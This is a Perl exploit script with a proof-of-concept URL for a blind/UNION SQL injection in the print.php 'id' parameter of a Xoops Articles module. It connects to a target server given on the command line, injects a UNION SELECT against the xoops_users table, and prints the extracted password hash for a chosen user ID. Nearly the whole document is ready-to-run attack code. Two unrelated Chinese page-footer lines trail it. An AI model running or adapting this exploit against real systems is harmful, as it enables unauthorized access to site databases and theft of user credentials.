#!/usr/bin/perl -w
# Xoops All Version -Articles- Print.PHP (ID) Blind SQL Injection Exploit And PoC
# Type :
# SQL Injection
# Release Date :
# {2007-03-26}
# Product / Vendor :
# http://support.sirium.net/
# Bug :
# http://localhost/script/modules/articles/print.php?id=x AND 1=1 or 1=0
# PoC :
# http://localhost/script/modules/articles/print.php?id=3/**/UNION/**/SELECT/**/NULL,NULL,NULL,NULL,uid,uname,pass,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL/**/FROM/**/xoops_users/**/LIMIT/**/1,1/*
# Exploit :
#############################################
#Exploit Coded By UNIQUE-KEY[UNIQUE-CRACKER]#
#############################################
use IO::Socket;
if (@ARGV != 3)
{
print \"
-----------------------------------
\";
print \"Xoops All Version -Articles- Print.PHP (ID) Blind SQL Injection Exploit
\";
print \"-----------------------------------
\";
print \"
UniquE-Key{UniquE-Cracker}
\";
print \"UniquE[at]UniquE-Key.ORG
\";
print \"http://UniquE-Key.ORG
\";
print \"
-----------------------------------
\";
print \"
Usage: $0 <server> <path> <uid>
\";
print \"Examp: $0 www.victim.com /path 1
\";
print \"
-----------------------------------
\";
exit ();
}
$server = $ARGV[0];
$path = $ARGV[1];
$uid = $ARGV[2];
$socket = IO::Socket::INET->new( Proto => \"tcp\", PeerAddr => \"$server\", PeerPort => \"80\");
printf $socket (\"GET %s/modules/articles/print.php?id=3/**/UNION/**/SELECT/**/NULL,NULL,NULL,NULL,NULL,pass,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL/**/FROM/**/xoops_users/**/WHERE/**/uid=$uid/* HTTP/1.0
Host: %s
Accept: */*
Connection: close
\",
$path,$server,$uid);
while(<$socket>)
{
if (/>(w{32})</) { print \"
ID \'$uid\' User Password :
$1
\"; }
}
# Tested :
# All Version
# Author :
# UniquE-Key{UniquE-Cracker}
# UniquE(at)UniquE-Key.Org
# http://www.UniquE-Key.Org
京公网安备 11010502034610号
暂无评论